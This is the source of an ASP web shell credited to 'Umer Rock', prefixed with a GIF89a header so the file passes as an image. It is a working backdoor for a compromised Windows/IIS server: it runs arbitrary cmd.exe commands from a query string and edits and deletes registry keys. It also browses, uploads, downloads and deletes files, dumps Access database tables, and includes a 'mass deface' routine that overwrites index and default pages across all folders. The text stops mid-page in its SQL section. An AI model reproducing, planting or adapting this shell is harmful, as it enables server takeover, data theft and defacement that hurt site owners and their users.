GIF89a; <%@ LANGUAGE = VBScript.Encode%> <%//**Start Encode On Error Resume Next Dim myFSO,showdisks Set myFSO = CreateObject ("Scripting.FileSystemObject") showdisks=FALSE Server.ScriptTimeOut = 7200 Class FileUploader Public Files Private mcolFormElem Private Sub Class_Initialize() Set Files = Server.CreateObject("Scripting.Dictionary") Set mcolFormElem = Server.CreateObject("Scripting.Dictionary") End Sub Private Sub Class_Terminate() If IsObject(Files) Then Files.RemoveAll() Set Files = Nothing End If If IsObject(mcolFormElem) Then mcolFormElem.RemoveAll() Set mcolFormElem = Nothing End If End Sub Public Property Get Form(sIndex) Form = "" If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex)) End Property Public Default Sub Upload() Dim biData, sInputName Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos Dim nPosFile, nPosBound biData = Request.BinaryRead(Request.TotalBytes) nPosBegin = 1 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) If (nPosEnd-nPosBegin) <= 0 Then Exit Sub vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) nDataBoundPos = InstrB(1, biData, vDataBounds) Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--")) nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition")) nPos = InstrB(nPos, biData, CByteString("name=")) nPosBegin = nPos + 6 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename=")) nPosBound = InstrB(nPosEnd, biData, vDataBounds) If nPosFile <> 0 And nPosFile < nPosBound Then Dim oUploadFile, sFileName Set oUploadFile = New UploadedFile nPosBegin = nPosFile + 10 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\")) nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:")) nPosBegin = nPos + 14 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosBegin = nPosEnd+4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin) If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile Else nPos = InstrB(nPos, biData, CByteString(Chr(13))) nPosBegin = nPos + 4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) End If nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds) Loop End Sub Private Function CByteString(sString) Dim nIndex For nIndex = 1 to Len(sString) CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) Next End Function Private Function CWideString(bsString) Dim nIndex CWideString ="" For nIndex = 1 to LenB(bsString) CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) Next End Function End Class Class UploadedFile Public ContentType Public FileName Public FileData Public Property Get FileSize() FileSize = LenB(FileData) End Property Public Sub SaveToDisk(sPath) Dim oFS, oFile Dim nIndex If sPath = "" Or FileName = "" Then Exit Sub If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" Set oFS = Server.CreateObject("Scripting.FileSystemObject") If Not oFS.FolderExists(sPath) Then Exit Sub Set oFile = oFS.CreateTextFile(sPath & FileName, True) For nIndex = 1 to LenB(FileData) oFile.Write Chr(AscB(MidB(FileData,nIndex,1))) Next oFile.Close End Sub Public Sub SaveToDatabase(ByRef oField) If LenB(FileData) = 0 Then Exit Sub If IsObject(oField) Then oField.AppendChunk FileData End If End Sub End Class startcode = ".:: Umer Rock's ASP SHELL.... ::." endocde = "" onlinehelp = ".:: ONLINE HELP ::.
" Function HexConv(hexVar) Dim hxx, hxx_var, multiply IF hexVar <> "" THEN hexVar = UCASE(hexVar) hexVar = StrReverse(hexVar) DIM hx() REDIM hx(LEN(hexVar)) hxx = 0 hxx_var = 0 FOR hxx = 1 TO LEN(hexVar) IF multiply = "" THEN multiply = 1 hx(hxx) = mid(hexVar,hxx,1) hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var multiply = (multiply * 16) NEXT hexVar = hxx_var HexConv = hexVar END IF End Function cprthtml = ".:: 3FEShell 1.0 ::." Function get_hxno(ghx) If ghx = "A" Then ghx = 10 ElseIf ghx = "B" Then ghx = 11 ElseIf ghx = "C" Then ghx = 12 ElseIf ghx = "D" Then ghx = 13 ElseIf ghx = "E" Then ghx = 14 ElseIf ghx = "F" Then ghx = 15 End If get_hxno = ghx End Function keydec=".:: Smart.Shell 1.0 © BY Umer Rock - .:UmerRock@live.com:." Function showobj(objpath) showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath)) End Function Function showobjpath(objpath) showobjpath = Left(objpath,InstrRev(objpath,"\")) End Function Function checking(a,b) ' If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then ' pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error" ' Response.Redirect(pagina) ' End If End Function Sub hdr() Response.Write startcode Response.Write keydec Response.Write "
" End Sub sub araBul(path_,ara_) on error resume next If Len(path_) > 0 Then cur = path_&"\" If cur = "\\" Then cur = "" parent = "" If InStrRev(cur,"\") > 0 Then parent = Left(cur, InStrRev(cur, "\", Len(cur)-1)) End If Else cur = "" End If Set f = myFSO.GetFolder(cur) Set fc = f.Files For Each f1 In fc if lcase(InStr(1,f1.name,lcase(ara_)))>0 then downStr = "?/a>" if lcase(ara_)="mdb" then Response.Write downStr&"?/a> * "& f1.path &" ["&f1.size&"]"&"
" else Response.Write downStr&"?/a>! - "& f1.path &" ["&f1.size&"]
" end if end if Next Set fs = f.SubFolders For Each f1 In fs araBul f1.path,ara_ Next Set f = Nothing Set fc = Nothing Set fs = Nothing end sub Sub showcontent() showdisks=TRUE Response.Write ".:: DRIVES ::.
.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "

" If Trim(Request.QueryString("raiz")) = "root" Then Set fs=Server.Createobject("Scripting.FileSystemObject") Set drivecollection=fs.drives Response.Write "" For Each drive IN drivecollection str=drive.driveletter & ":" Response.Write "" & UCase(str) & "
" Select Case drive.DriveType Case 0 tipodrive = "Unknown" nomedrive = drive.VolumeName Case 1 tipodrive = "Removable" If drive.isready Then nomedrive = drive.VolumeName Else nomedrive = "" End If Case 2 tipodrive = "Fixed" If drive.isready Then nomedrive = drive.VolumeName Else nomedrive = "" End If Case 3 tipodrive = "Network" If drive.isready Then nomedrive = drive.ShareName Else nomedrive = "" End If Case 4 tipodrive = "CD-Rom" If drive.isready Then nomedrive = drive.VolumeName Else nomedrive = "" End If Case 5 tipodrive = "RAM Disk" If drive.isready Then nomedrive = drive.VolumeName Else nomedrive = "" End If End Select response.write "Type: " & tipodrive & "
" response.write "Name: " & nomedrive & "
" response.write "File System: " If drive.isready Then set sp=fs.getdrive(str) response.write sp.filesystem & "
" Else response.write "-
" End If Response.Write "Disk Space: " If drive.isready Then freespace = (drive.AvailableSpace / 1048576) set sp=fs.getdrive(str) response.write(Round(freespace,1) & " MB
") Else response.write("-
") End If Response.Write "Total Space: " If drive.isready Then totalspace = (drive.TotalSize / 1048576) set sp=fs.getdrive(str) response.write(Round(totalspace,1) & " MB
") Else response.write("-
") End If Response.Write "
" Next Response.Write "
" Set fs = Nothing Set drivecollection = Nothing set sp=Nothing Else If Trim(Request.QueryString("raiz")) = "" Then caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) pos = Instr(caminho,"\") pos2 = 1 While pos2 <> 0 If Instr(pos + 1,caminho,"\") <> 0 Then pos = Instr(pos + 1,caminho,"\") Else pos2 = 0 End If Wend raiz = Left(caminho,pos) Else raiz = trim(Request.QueryString("raiz")) & "\" End If Set ObjFSO = CreateObject("Scripting.FileSystemObject") Set MonRep = ObjFSO.GetFolder(raiz) Set ColFolders = MonRep.SubFolders Set ColFiles0 = MonRep.Files Response.Write "MASS TEST IN " & UCase(raiz) & "

" Response.Write "MASS DEFACE IN " & UCase(raiz) & "

" Response.Write "UPLOAD FILE TO " & UCase(raiz) & "

" Response.Write "" Response.Write "PROMPT" Response.Write " - SYS INFO" Response.Write " - REGEDIT" Response.Write " - SEARCH" Response.Write " - EXECUTE SQL" Response.Write " - ABOUT" Response.Write "

" Response.Write "Root Folder: " & raiz & "

" If CInt(Len(raiz) - 1) <> 2 Then barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1 backlevel = Left(raiz,barrapos) Response.Write "<DIR> . .
" Else Response.Write "<DIR> . . 
" End If Response.Write "" for each folderItem in ColFolders Response.Write "" Response.Write "" Response.Write "" next Response.Write "
<DIR> " & showobj(folderItem.path) & "  << PUT  << Copy/Move  << Delete

" marcatabela = true for each FilesItem0 in ColFiles0 If marcatabela = true then corfundotabela = " bgcolor=""#EEEEEE""" Else corfundotabela = "" End If Response.Write ":: " & showobj(FilesItem0.path) & "" marcatabela = NOT marcatabela next Response.Write "
  " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes     o.GET.o    o.REN.o    o.DEL.o    o.VIEW.o    o.EDIT.o    o.?ndir.o    o.FileCopy.o
" End If End Sub Select Case Trim(Request.QueryString("action")) Case "get" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp caminho = Replace(Trim(Request.QueryString("path")),"|","\") Set ObjFSO = CreateObject("Scripting.FileSystemObject") Set MyFile = ObjFSO.GetFile(caminho) destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) MyFile.Copy (destino) If Err.Number = 0 Then Response.Write "


File: " & caminho & "
Copied to: " & destino End If Case "put" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp If Trim(Request.QueryString("arquivo")) = "" Then caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) varpath = Trim(Request.QueryString("path")) Set ObjFSO = CreateObject("Scripting.FileSystemObject") Set MonRep = ObjFSO.GetFolder(caminho) Set ColFolders = MonRep.SubFolders Set ColFiles0 = MonRep.Files Response.Write "Select File:
" for each FilesItem0 in ColFiles0 Response.Write "" next Response.Write "
:: " & showobj(FilesItem0.path) & "  " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes     :: SELECT ::
" Else destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\" arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\") Set ObjFSO = CreateObject("Scripting.FileSystemObject") Set MyFile = ObjFSO.GetFile(arquivo) MyFile.Copy (destino) If Err.Number = 0 Then Response.Write "


File: " & arquivo & "
Copied to: " & destino End If End If Case "del" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp caminho = Replace(Trim(Request.QueryString("path")),"|","\") Set ObjFSO = CreateObject("Scripting.FileSystemObject") Set MyFile = ObjFSO.GetFile(caminho) MyFile.Delete If Err.Number = 0 Then Response.Write "" Response.Write "


Folder " & caminho & " Deleted.
" End If Case "fdel" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp caminho = Replace(Trim(Request.QueryString("path")),"|","\") Set ObjFSO = CreateObject("Scripting.FileSystemObject") ObjFSO.DeleteFolder caminho If Err.Number = 0 Then Response.Write "" Response.Write "


File " & caminho & " Deleted.
" End If Case "ren" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp If Trim(Request.QueryString("status")) <> "2" Then caminho = Replace(Trim(Request.QueryString("path")),"|","\") arquivo = showobj(caminho) Response.Write "
" & arquivo & "
" & _ "
" & _ "" & _ "" & _ "" & _ "New Name: " & _ "  " & _ "
" Else caminho = Replace(Trim(Request.QueryString("path")),"|","\") Set ObjFSO = CreateObject("Scripting.FileSystemObject") Set MyFile = ObjFSO.GetFile(caminho) destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname")) MyFile.Move (destino) If Err.Number = 0 Then Response.Write "


Arquivo: " & caminho & "
renomeado para: " & destino Response.Write "" End If End If Case "error" Response.Write "
C?DIGO CORROMPIDO
CORRUPT CODE
" Case "cmd" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.QueryString(".CMD") If (szCMD <> "") Then szTempFile = "c:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If Response.Write "


" If (IsObject(oFile)) Then On Error Resume Next Response.Write "" Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"
")," "," ") oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If Case "info" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp Set WshNetwork = Server.CreateObject("WScript.Network") Set WshShell = Server.CreateObject("WScript.Shell") Set WshEnv = WshShell.Environment("SYSTEM") Response.Write "
" Response.Write "User Properties:
" Response.Write "UserName: " & WshNetwork.UserName & "
" Response.Write "Computer Name: " & WshNetwork.ComputerName & "
" Response.Write "User Domain: " & WshNetwork.UserDomain & "
" Set Drives = WshNetwork.EnumNetworkDrives For i = 0 to Drives.Count - 1 Response.Write "Drive de Rede (Mapeado): " & Drives.Item(i) & "
" Next Response.Write "
Cpu Information:
" Response.Write "Processor Architecture: " & WshEnv("PROCESSOR_ARCHITECTURE") & "
" Response.Write "Number Of Processors: " & WshEnv("NUMBER_OF_PROCESSORS") & "
" Response.Write "Processor Identifier: " & WshEnv("PROCESSOR_IDENTIFIER") & "
" Response.Write "Processor Level: " & WshEnv("PROCESSOR_LEVEL") & "
" Response.Write "Processor Revision: " & WshEnv("PROCESSOR_REVISION") & "
" Response.Write "
Operating System Information:
" Response.Write "IP: " & request.servervariables("LOCAL_ADDR") & "
" Response.Write "Sistem OS: " & WshEnv("OS") & "
" Response.Write "Server Software: " & request.servervariables("SERVER_SOFTWARE") & "
" Response.Write "Cmd Path: " & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "
" Response.Write "Public Paths: " & WshEnv("PATH") & "
" Response.Write "Executables: " & WshEnv("PATHEXT") & "
" Response.Write "Prompt: " & WshEnv("PROMPT") & "
" Response.Write "System Drive: " & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "
" Response.Write "System Root: " & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "
" Response.Write "System32 Path: " & WshShell.CurrentDirectory & "
" Set Drives = Nothing Set WshNetwork = Nothing Set WshShell = Nothing Set WshEnv = Nothing Case "reg" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp Set WshShell = Server.CreateObject("WScript.Shell") Response.Write "
Registry Editor:

" Select Case Trim(Request.QueryString("regaction")) Case "w" If Trim(Request.QueryString("process")) = "yes" Then Select Case Trim(Request.QueryString("type")) Case "1" teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ") Case "2" teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD") Case "3" teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY") Case "4" teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ") Case "5" teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ") End Select Response.Write "

Registry " Response.Write Trim(Request.QueryString("key")) & " Changed.
" Response.Write "

Main Menu
" Else Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "
ROOT KEY NAMEABREVIAC?O
HKEY_CURRENT_USER HKCU
HKEY_LOCAL_MACHINE HKLM
HKEY_CLASSES_ROOT HKCR
HKEY_USERS HKEY_USERS
HKEY_CURRENT_CONFIG HKEY_CURRENT_CONFIG

" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "
Type Description Figure
REG_SZ String String
REG_DWORD Number DWORD
REG_BINARY Binary VBArray DWORD
REG_EXPAND_SZ String Expand (ex. ""%windir%\\calc.exe"") String
REG_MULTI_SZ Array Of Strings VBArray Of Strings
" Response.Write "

" Response.Write "" Response.Write "" Response.Write "" Response.Write "
KEY:
( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
VALUE:
TYPE:
" Response.Write "" Response.Write "" Response.Write "
" Response.Write "

Main Menu
" End If Case "r" If Trim(Request.QueryString("process")) = "yes" Then Response.Write "" & Trim(Request.QueryString("key")) & "
" Response.Write "Value: " & WshShell.RegRead (Trim(Request.QueryString("key"))) Else Response.Write "
" Response.Write "KEY:
( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
" Response.Write "" Response.Write "" Response.Write "" Response.Write "" End If Response.Write "

Main Menu
" Case "d" If Trim(Request.QueryString("process")) = "yes" Then teste = WshShell.RegDelete (Trim(Request.QueryString("key"))) Response.Write "Chave " & Trim(Request.QueryString("key")) & " Deleted." Else Response.Write "
" Response.Write "KEY: ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
" Response.Write "" Response.Write "" Response.Write "" Response.Write "" End If Response.Write "

Main Menu
" Case Else Response.Write "WRITE VALUE

" Response.Write "READ VALUE

" Response.Write "DELETE KEY
" End Select Set WshShell = Nothing Case "txtview" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp & "" file = Replace(Trim(Request.QueryString("file")),"|","\") Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.OpenTextFile(file) Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"
")," "," ") Set a = Nothing Set fso = Nothing Case "txtedit" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp If Request.Form.Count = 0 Then file = Replace(Trim(Request.QueryString("file")),"|","\") Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.OpenTextFile(file) Response.Write "
" Response.Write "
" Response.Write "" Response.Write "     
" Set a = Nothing Set fso = Nothing Else Select Case Trim(Request.Form("savemethod")) Case "Save" Set fso = CreateObject("Scripting.FileSystemObject") novotexto = Trim(Request.Form("content")) novotexto = Split(novotexto,vbCrLf) Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2) For i = 0 To UBound(novotexto) objstream.WriteLine(novotexto(i)) Next objstream.Close Set objstream = Nothing Response.Write "Texto salvo: " & Replace(Trim(Request.Form("path")),"|","\") & "" Case "Save as" Set fso = CreateObject("Scripting.FileSystemObject") novotexto = Trim(Request.Form("content")) novotexto = Split(novotexto,vbCrLf) caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" Set objstream = fso.CreateTextFile(caminho,true,false) For i = 0 To UBound(novotexto) objstream.WriteLine(novotexto(i)) Next objstream.Close Set objstream = Nothing Response.Write "
" Response.Write "
" Response.Write "" Response.Write "
" Case Else caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" Set ObjFSO = CreateObject("Scripting.FileSystemObject") Set MyFile = ObjFSO.GetFile(caminho) destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename")) MyFile.Move (destino) If Err.Number = 0 Then Response.Write "


Arquivo: " & destino & " salvo!" Response.Write "" End If End Select End If Case "download" Response.Buffer = True Response.Clear strFileName = Replace(Trim(Request.QueryString("file")),"|","\") strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\")) strFileType = Request.QueryString("type") if strFileType = "" then strFileType = "application/download" Set fso = Server.CreateObject("Scripting.FileSystemObject") Set f = fso.GetFile(strFilename) intFilelength = f.size Set f = Nothing Set fso = Nothing Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile Response.AddHeader "Content-Length", intFilelength Response.Charset = "UTF-8" Response.ContentType = strFileType Set Stream = Server.CreateObject("ADODB.Stream") Stream.Open Stream.type = 1 Stream.LoadFromFile strFileName Response.BinaryWrite Stream.Read Response.Flush Stream.Close Set Stream = Nothing Case "upload" If Request.QueryString("processupload") <> "yes" Then Response.Write "
" Response.Write "" Response.Write "" Response.Write "" Response.Write "
Select a file to upload:
" Else Set Uploader = New FileUploader Uploader.Upload() If Uploader.Files.Count = 0 Then Response.Write "File(s) not uploaded." Else For Each File In Uploader.Files.Items File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\") Response.Write "File Uploaded: " & File.FileName & "
" Response.Write "Size: " & File.FileSize & " bytes
" Response.Write "Type: " & File.ContentType & "

" Response.Write "" Next End If End If Case "mass" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo) On Error Resume Next Set MonRep = ObjFSO.GetFolder(caminhodomass) Set ColFolders = MonRep.SubFolders for each folderItem in ColFolders destino1 = folderItem.path & "\index.htm" destino2 = folderItem.path & "\index.html" destino3 = folderItem.path & "\index.asp" destino4 = folderItem.path & "\index.cfm" destino5 = folderItem.path & "\index.php" destino6 = folderItem.path & "\default.htm" destino7 = folderItem.path & "\default.html" destino8 = folderItem.path & "\default.asp" destino9 = folderItem.path & "\default.cfm" destino10 = folderItem.path & "\default.php" MeuArquivo.Copy(destino1) MeuArquivo.Copy(destino2) MeuArquivo.Copy(destino3) MeuArquivo.Copy(destino4) MeuArquivo.Copy(destino5) MeuArquivo.Copy(destino6) MeuArquivo.Copy(destino7) MeuArquivo.Copy(destino8) MeuArquivo.Copy(destino9) MeuArquivo.Copy(destino10) Response.Write "" If Err.Number = 0 Then Response.Write "" Else Response.Write "
<DIR> " & folderItem.path & "  DONE!
  " & UCase(Err.Description) & "
" End If Err.Number = 0 Response.Flush If metodo = "brute" Then Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo) End If next End Sub Sub brutemass(caminho,massaction) If massaction = "test" Then On Error Resume Next Set MonRep = ObjFSO.GetFolder(caminho) Set ColFolders = MonRep.SubFolders Set ColFiles0 = MonRep.Files for each folderItem in ColFolders Set TotalFolders = ObjFSO.GetFolder(folderItem.path) Set EachFolder = TotalFolders.SubFolders Response.Write "" maindestino = folderItem.path & "\" MeuArquivo.Copy(maindestino) Response.Write "" If Err.Number = 0 Then Response.Write "" Else Response.Write "" End If Err.Number = 0 Response.Flush If EachFolder.count > 0 Then masscontador = 0 for each subpasta in EachFolder masscontador = masscontador + 1 destino = subpasta.path & "\" If masscontador = 1 Then destinofinal = destino pathfinal = subpasta.path Err.Number = 0 MeuArquivo.Copy(destinofinal) Response.Write "" If Err.Number = 0 Then Response.Write "" Else Response.Write "" End If Err.Number = 0 Response.Flush Else MeuArquivo.Copy(destino) Response.Write "" If Err.Number = 0 Then Response.Write "" Else Response.Write "" End If Err.Number = 0 Response.Flush End If next masscontador = 0 End If Response.Write "
<DIR> " & maindestino & "  Acesso Permitido
  " & UCase(Err.Description) & "
<DIR> " & showobj(pathfinal) & "  Acesso Permitido
  " & UCase(Err.Description) & "
<DIR> " & showobj(subpasta.path) & "  Acesso Permitido
  " & UCase(Err.Description) & "

" Call brutemass(folderItem.path & "\","test") next Set MonRep = Nothing Set ColFolders = Nothing Set ColFiles0 = Nothing Else If Request.Form.Count = 0 Then Response.Write "

Brute: Test and Deface root and sub directories.

" Response.Write "Single: Test and deface only root directories.

" Response.Write "" Response.Write "" Response.Write "
Deface Code:
" Response.Write "
" Response.Write "Brute   " Response.Write "Single
" Response.Write "
" Response.Write "" Else Set ObjFSO = CreateObject("Scripting.FileSystemObject") patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) arquivomassdfc = patharquivotxt & "teste.txt" Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False) vetordelinhas = Split(Request.Form("content"),VbCrLf) For i = 0 To UBound(vetordelinhas) Arquivotxt.WriteLine(vetordelinhas(i)) Next Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc) If Request.Form("massopt") = "single" Then Call themassdeface(caminho,"single",ObjFSO,MeuArquivo) ElseIf Request.Form("massopt") = "brute" Then Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo) End If End If End If End Sub If Trim(Request.QueryString("massact")) = "test" Then Set ObjFSO = CreateObject("Scripting.FileSystemObject") patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) arquivo = patharquivotxt & "_vti_cnf.log" Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True) Set MeuArquivo = ObjFSO.GetFile(arquivo) Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test") ElseIf Trim(Request.QueryString("massact")) = "dfc" Then Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc") End If Case "fcopy" If Trim(Request.Form("submit1")) = "Copy" Then mptpath=Trim(Request.Form("path")) mptdest=Trim(Request.Form("cf")) Set ObjFSO = CreateObject("Scripting.FileSystemObject") isl = "" if Trim(Request.Form("islem"))="kopyala" then objFSO.CopyFolder mptpath,mptdest isl="Copied.." elseif Trim(Request.Form("islem"))="tasi" then objFSO.MoveFolder mptpath,mptdest isl="moved.." end if response.Write "Command: "&isl response.Write "
File From: " & mptpath & "
Copy to: " & mptdest response.Write "
" Else Response.Write "
" Response.Write "
Copy Path : " Response.Write "" Response.Write "" response.Write "" Response.Write "
" response.Write "Copy" response.Write "Move" response.Write "
" response.Write "
" End IF Case "filecopy" If Trim(Request.Form("submit1")) = "Copy" Then mptpath=Trim(Request.Form("path")) mptdest=Trim(Request.Form("cf")) Set ObjFSO = CreateObject("Scripting.FileSystemObject") isl = "" if Trim(Request.Form("islem"))="kopyala" then objFSO.CopyFile mptpath,mptdest isl="Copy.." elseif Trim(Request.Form("islem"))="tasi" then objFSO.MoveFile mptpath,mptdest isl="move.." end if response.Write "Command: "&isl response.Write "
File From: " & mptpath & "
Copy to: " & mptdest response.Write "
" Else Response.Write "
" Response.Write "
Copy Path : " Response.Write "" Response.Write "" response.Write "" Response.Write "
" response.Write "Copy" response.Write "Move" response.Write "
" response.Write "
" End IF Case "search" If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryString("status"))<>"" Then showdisks=FALSE status5=Trim(Request.Form("status")) if status5="" then status5=Trim(Request.QueryString("status")) SELECT CASE status5 CASE "5" Response.Write "
"& Trim(Request.QueryString("path")) &"

" Response.Write "
" set f = objFSO.OpenTextFile(Trim(Request.QueryString("path")),1) Response.Write "
"&Server.HTMLEncode(f.readAll)&"
" if err.number=62 then Response.Write "":Response.End CASE "7": Response.Write "Tables

" Set objConn = Server.CreateObject("ADODB.Connection") Set objADOX = Server.CreateObject("ADOX.Catalog") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Trim(Request.QueryString("path")) objConn.Open objADOX.ActiveConnection = objConn For Each table in objADOX.Tables If table.Type = "TABLE" Then Response.Write "4 "&table.Name&"
" End If Next CASE "8": table=Trim(Request.QueryString("table")) Response.Write "

Table Name: " & table & "




" Set objConn = Server.CreateObject("ADODB.Connection") Set objRcs = Server.CreateObject("ADODB.RecordSet") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Trim(Request.QueryString("path")) objConn.Open objRcs.Open table,objConn, adOpenKeyset , , adCmdText Response.Write "" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" do while not objRcs.EOF Response.Write "" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" objRcs.MoveNext loop Response.Write "
   "&objRcs.Fields(i).Name&"   
"&objRcs.Fields(i).Value&" 

" case "12": araBul Trim(Request.Form("path")),Trim(Request.Form("arama")) END SELECT Else showdisks=FALSE checa = checking(cprthtml,keydec) Call hdr() Response.Write "
" Response.Write "
File Ext: " Response.Write " " Response.Write "" Response.Write "
" End IF Case "sqlserver" If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor Trim(Request.QueryString("status"))<>"" Then showdisks=FALSE status5=Trim(Request.Form("status")) if status5="" then status5=Trim(Request.QueryString("status")) SELECT CASE status5 CASE "7": Response.Write "Tables

" Set objConn = Server.CreateObject("ADODB.Connection") Set objADOX = Server.CreateObject("ADOX.Catalog") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Trim(Request.QueryString("path")) objConn.Open objADOX.ActiveConnection = objConn For Each table in objADOX.Tables If table.Type = "TABLE" Then Response.Write "4 "&table.Name&"
" End If Next CASE "8": table=Trim(Request.QueryString("table")) Response.Write "

Table Name: " & table & "




